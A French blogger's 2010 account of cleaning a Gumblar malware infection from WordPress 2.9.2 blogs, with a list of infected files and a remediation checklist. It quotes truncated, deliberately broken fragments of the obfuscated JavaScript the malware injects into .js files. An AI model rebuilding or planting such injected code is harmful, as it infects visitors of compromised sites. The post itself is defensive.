Date : 22 Avril 2010
Auteur : Christian Perpezat

   J'ai subi l'attaque de gumblar sur mes sites en mai/juin 2009 et j'en ai déjà parlé ici. Cette fois c'est le site d'une amie qui est touché, enfin un hébergement ou elle dispose de 6 blogs Wordpress.

 Bizarrement ce sont les blogs en version 2.9.2 qui sont touchés alors que ceux en version inférieure 2.8.4 et 2.8.6 sont épargnés.

  Message d'erreur quand on se connecte sur un des blogs :
 Parse error: syntax error, unexpected '<' in /homepages/40/d320251xxx/htdocs/répertoire-site/wp-includes/default-filters.php on line 229

  Après réparation du fichier default-filter.php, chaque visite sur le site concerné faisait alarmer Kaspersky sur mon PC. Message d'erreur ( image ) :

  
  J'ai utilisé la méthode manuelle pour réparer ces blogs, à noter qu'il existe un anti-virus Web-Guardian, créé par J.Teng depuis Janvier 2010 -> voir en bas de cette page
 

  
  Sans exceptions, ce sont tous les fichiers index.php, et tous les fichiers javascript donc en .js

  Ensuite sous wp-includes, les fichiers default-filters.php et default-widgets.php, sous wp-admin, le fichier index-extra.php

  Le virus gumblar rajoute une ligne de près de 4000 caractères en fin des fichiers index.php . Sans être parano, je préfère ne mettre ici qu'une image. On peut noter la chaine "unescape" ligne 2 :



     Pour les fichier javascript donc en .js, il y a 2 lignes rajoutées commençant par :
var XE=ne w String();try {var o=new String();this.dl='';var i;if(i!='' && i!='D'){i=null};var f=new Array();var  q=window[unescap e ("% 75%6e%65%73%63%61%70%65")]........
et :
var d;if(d!='v'){d=''};var ox;if(ox!='' && ox!='va'){ox=null};function M(){var AT=new String();var a=window;this.s="";this.JY="";var p=a['unescap e'];this.CQI='';var lZ;if(lZ!=''){lZ='BG'};var i=p("% 2f%67%6f%6f%67 .......

 Ce qui produit le même effet que la ligne contenant seulement iframe de ce même virus en mai 2009
  
 

  
  A moins d'avoir une sauvegarde complète de l'ensemble des fichiers contenus sur son serveur, ou demander à son hébergeur une restauration complète, il faut s'attaquer au problème manuellement. 
   J'ai fait une vidéo, mais bon, le son et l'image ne sont pas top et j'ai un peu abrégé :

  Pour ces blogs, j'ai pris comme un défi de les réparer manuellement, c'est mon métier de base :

• suppression de la ligne rajoutée par gumblar dans tous les fichiers index.php et autres
• suppression des 2 lignes rajoutées dans tous les fichiers javascripts ( en .js )
• j'ai un peu triché j'ai copié/collé les fichiers .js d'origine pour wp-admin/js et wp-includes/js

  A savoir que tous les fichiers infectés l'avaient été à la même date, soit une vingtaine de fichiers index.php et environ 270 fichiers en .js
 

 
  A faire, sachant qu'un seul oubli peut conduire à tout recommencer :

1. Nettoyer complètement le PC, anti-virus à jour, Kasperski semble suffisant
2. Mettre à jour Adobe Acrobat Reader et Adobe Flash Player 
3. Supprimer le logiciel FTP et toutes les traces de son installation
4. Ré-installer ce logiciel FTP et ne JAMAIS enregistrer le mot de passe
5. Ensuite modifier les mots de passe FTP du serveur, depuis un autre PC si possible 
6. Corriger les fichiers index et autres fichiers infectés
7. Sauvegarder le site
8. Prier, je plaisante :-)

  Cette liste n'a pas la prétention d'être exhaustive, elle n'est valable que dans le cas d'infection par le code malicieux iframe ou ligne contenant la chaine unescape(
  Autres constatations :

• seuls les blogs wordpress version 2.9.2 de cet hébergement 1and1 ont été infectés
• Kasperski empêche le PC d'être de nouveau contaminé (pub gratuite)
• il semble qu'Avast soit efficace, mais je ne l'ai pas testé